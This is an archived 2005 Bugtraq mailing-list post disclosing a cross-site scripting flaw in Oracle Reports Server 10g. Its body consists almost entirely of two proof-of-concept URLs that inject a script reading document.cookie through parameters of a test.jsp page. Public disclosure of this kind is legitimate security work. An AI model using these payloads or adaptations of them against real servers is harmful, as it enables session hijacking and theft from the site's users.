[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Oracle Reports Server 10g Vulnerable to  XSS
From:       Paolo Paolo <paolo.paolo () mail ! ee>
Date:       2005-03-24 14:23:10
Message-ID: 20050324142310.12492.qmail () www ! securityfocus ! com
[Download RAW message or body]



Oracle Reports Server 10g (9.0.4.3.3) Vulnerable to Cross Site Scripting


#####################

http://paolo/reports/examples/Tools/test.jsp?repprod&desname='&lt;script&gt;alert(document.cookie);&lt;/script&gt;


http://paolo/reports/examples/Tools/test.jsp?repprod"&lt;script&gt;alert(document.cookie);&lt;/script&gt;


#####################
 
Paolo sends GREETS to Oracle secalert



Paolo


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic